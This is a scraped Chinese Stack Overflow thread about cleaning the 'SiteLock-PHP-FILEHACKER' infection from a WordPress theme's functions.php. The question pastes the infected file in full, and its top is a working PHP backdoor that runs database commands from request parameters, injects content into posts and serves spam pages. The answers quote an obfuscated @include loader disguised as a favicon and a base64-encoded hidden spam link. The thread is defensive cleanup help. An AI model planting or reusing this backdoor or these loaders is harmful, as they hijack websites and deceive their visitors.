如何摆脱 WordPress functions.php 中的“SiteLock-PHP-FILEHACKER-of.UNOFFICIAL”
Posted
技术标签:
【中文标题】如何摆脱 WordPress functions.php 中的“SiteLock-PHP-FILEHACKER-of.UNOFFICIAL”【英文标题】:How to get rid of "SiteLock-PHP-FILEHACKER-of.UNOFFICIAL" in WordPress functions.php 【发布时间】:2017-06-05 01:43:20 【问题描述】:<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == ''))
switch ($_REQUEST['action'])
case 'get_all_links';
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
$data['code'] = '';
if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
$data['code'] = $_[1];
print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
break;
case 'set_id_links';
if (isset($_REQUEST['data']))
$data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');
$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';
if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
print "true";
break;
case 'create_page';
if (isset($_REQUEST['remove_page']))
if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
print "true";
elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
print "true";
break;
default: print "ERROR_WP_ACTION WP_URL_CD";
die("");
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
$data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
if ($data -> full_content)
print stripslashes($data -> content);
else
print '<!DOCTYPE html>';
print '<html ';
language_attributes();
print ' class="no-js">';
print '<head>';
print '<title>'.stripslashes($data -> title).'</title>';
print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
print '<meta name="robots" content="index, follow" />';
print '<meta charset="';
bloginfo( 'charset' );
print '" />';
print '<meta name="viewport" content="width=device-width">';
print '<link rel="profile" href="http://gmpg.org/xfn/11">';
print '<link rel="pingback" href="';
bloginfo( 'pingback_url' );
print '">';
wp_head();
print '</head>';
print '<body>';
print '<div id="content" class="site-content">';
print stripslashes($data -> content);
get_search_form();
get_sidebar();
get_footer();
exit;
?><?php
/*
Our portfolio: http://themeforest.net/user/tagDiv/portfolio
Thanks for using our theme!
tagDiv - 2016
*/
/**
* Load the speed booster framework + theme specific files
*/
// load the deploy mode
require_once('td_deploy_mode.php');
// load the config
require_once('includes/td_config.php');
add_action('td_global_after', array('td_config', 'on_td_global_after_config'), 9); //we run on 9 priority to allow plugins to updage_key our apis while using the default priority of 10
// load the wp booster
require_once('includes/wp_booster/td_wp_booster_functions.php');
require_once('includes/td_css_generator.php');
require_once('includes/shortcodes/td_misc_shortcodes.php');
require_once('includes/widgets/td_page_builder_widgets.php'); // widgets
/*
* mobile theme css generator
* in wp-admin the main theme is loaded and the mobile theme functions are not included
* required in td_panel_data_source
* @todo - look for a more elegant solution(ex. generate the css on request)
*/
require_once('mobile/includes/td_css_generator_mob.php');
/* ----------------------------------------------------------------------------
* Woo Commerce
*/
// breadcrumb
add_filter('woocommerce_breadcrumb_defaults', 'td_woocommerce_breadcrumbs');
function td_woocommerce_breadcrumbs()
return array(
'delimiter' => ' <i class="td-icon-right td-bread-sep"></i> ',
'wrap_before' => '<div class="entry-crumbs" itemprop="breadcrumb">',
'wrap_after' => '</div>',
'before' => '',
'after' => '',
'home' => _x('Home', 'breadcrumb', 'woocommerce'),
);
// use own pagination
if (!function_exists('woocommerce_pagination'))
// pagination
function woocommerce_pagination()
echo td_page_generator::get_pagination();
// Override theme default specification for product 3 per row
// Number of product per page 8
add_filter('loop_shop_per_page', create_function('$cols', 'return 4;'));
if (!function_exists('woocommerce_output_related_products'))
// Number of related products
function woocommerce_output_related_products()
woocommerce_related_products(array(
'posts_per_page' => 4,
'columns' => 4,
'orderby' => 'rand',
)); // Display 4 products in rows of 1
/* ----------------------------------------------------------------------------
* bbPress
*/
// change avatar size to 40px
function td_bbp_change_avatar_size($author_avatar, $topic_id, $size)
$author_avatar = '';
if ($size == 14)
$size = 40;
$topic_id = bbp_get_topic_id( $topic_id );
if ( !empty( $topic_id ) )
if ( !bbp_is_topic_anonymous( $topic_id ) )
$author_avatar = get_avatar( bbp_get_topic_author_id( $topic_id ), $size );
else
$author_avatar = get_avatar( get_post_meta( $topic_id, '_bbp_anonymous_email', true ), $size );
return $author_avatar;
add_filter('bbp_get_topic_author_avatar', 'td_bbp_change_avatar_size', 20, 3);
add_filter('bbp_get_reply_author_avatar', 'td_bbp_change_avatar_size', 20, 3);
add_filter('bbp_get_current_user_avatar', 'td_bbp_change_avatar_size', 20, 3);
//add_action('shutdown', 'test_td');
function test_td ()
if (!is_admin())
td_api_base::_debug_get_used_on_page_components();
/**
* tdStyleCustomizer.js is required
*/
if (TD_DEBUG_LIVE_THEME_STYLE)
add_action('wp_footer', 'td_theme_style_footer');
// new live theme demos
function td_theme_style_footer()
?>
<div id="td-theme-settings" class="td-live-theme-demos td-theme-settings-small">
<div class="td-skin-body">
<div class="td-skin-wrap">
<div class="td-skin-container td-skin-buy"><a target="_blank" href="http://themeforest.net/item/newspaper/5489609?ref=tagdiv">BUY NEWSPAPER NOW!</a></div>
<div class="td-skin-container td-skin-header">GET AN AWESOME START!</div>
<div class="td-skin-container td-skin-desc">With easy <span>ONE CLICK INSTALL</span> and fully customizable options, our demos are the best start you'll ever get!!</div>
<div class="td-skin-container td-skin-content">
<div class="td-demos-list">
<?php
$td_demo_names = array();
foreach (td_global::$demo_list as $demo_id => $stack_params)
$td_demo_names[$stack_params['text']] = $demo_id;
?>
<div class="td-set-theme-style"><a href="<?php echo td_global::$demo_list[$demo_id]['demo_url'] ?>" class="td-set-theme-style-link td-popup td-popup-<?php echo $td_demo_names[$stack_params['text']] ?>" data-img-url="http://demo.tagdiv.com/demos_popup/newspaper/large/<?php echo $demo_id; ?>.jpg"></a></div>
<?php ?>
<div class="clearfix"></div>
</div>
</div>
<div class="td-skin-scroll"><i class="td-icon-read-down"></i></div>
</div>
</div>
<div class="clearfix"></div>
<div class="td-set-hide-show"><a href="#" id="td-theme-set-hide"></a></div>
<div class="td-screen-demo" data-width-preview="380"></div>
<div class="td-screen-demo-extend"></div>
</div>
<?php
//print_r(td_global::$all_theme_panels_list);
我的主机病毒扫描程序检测到主题 function.php 文件中有病毒。不知道如何在不影响网站的情况下删除代码。请帮我清除这个functions.php中的恶意病毒代码“SiteLock-PHP-FILEHACKER-of.UNOFFICIAL”
【问题讨论】:
functions.php is infected by siteLock-php-injector how to clean it?的可能重复 不,这并没有解决我遇到的问题 【参考方案1】:我一直在与这种病毒作斗争,我解决它的方法是:
分析所有目录
根据受感染的文件,使用 vim 或 nano 打开它们,您应该会看到注入,只需将其删除,您的文件应该没问题
重复所有被感染的文件,其中一些是由病毒导入的 .zip 文件,删除这些文件并保留原来的文件。
建议您更新插件和主题
希望它有效,它可能不是更有效的方法,但它对我有用。
【讨论】:
【参考方案2】:这些病毒会在您的大多数文件中添加一行代码,这些文件称为受影响的文件。
在我的情况下,受影响的文件有共同点:
@include "\x2fho\x6de/\x6bks\x68o3\x62c/\x70ub\x6cic\x5fht\x6dl/\x77p-\x69nc\x6cud\x65s/\x6as/\x6acr\x6fp/\x66av\x69co\x6e_f\x389a\x617.\x69co";
当您从所有这些文件中删除此行时,您就不会受到病毒/恶意软件的感染。
【讨论】:
【参考方案3】:我花了一些时间试图找到我的问题。
我找到了那行
<?php $xml='PGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyB0b3A6IDBweDsgbGVmdDogLTMzMzNweDsiPkZpbmQgdGhlIGxhc3Qgb2ZmZXJzIGJ5IFNreUJldCBhdCA8YSB0YXJnZXQ9Il9ibGFuayIgcmVsPSJub2ZvbGxvdyIgaHJlZj0iaHR0cDovL2JldHRpbmd5LmNvbS8iPnd3dy5iZXR0aW5neS5jb208L2E+IEJldHRpbmdZLmNvbSBCb251c2VzPC9kaXY+'; echo base64_decode($xml);?>
这似乎是有线的。我删除了它,一切都很完美。 我不知道这是主题的一部分还是黑客。但它显示了一个隐藏的 div,其中包含指向另一个网站的 href
<div style="position: absolute; top: 0px; left: -3333px;">Find the last offers by SkyBet at <a target="_blank" rel="nofollow" href="http://bettingy.com/">www.bettingy.com</a> BettingY.com Bonuses</div>
因此解决方案是尝试逐行读取文件并检查是否有行显示加密信息。并删除它。
【讨论】:
以上是关于如何摆脱 WordPress functions.php 中的“SiteLock-PHP-FILEHACKER-of.UNOFFICIAL”的主要内容,如果未能解决你的问题,请参考以下文章
如何在functions.php(wordpress)中加载引导脚本和样式?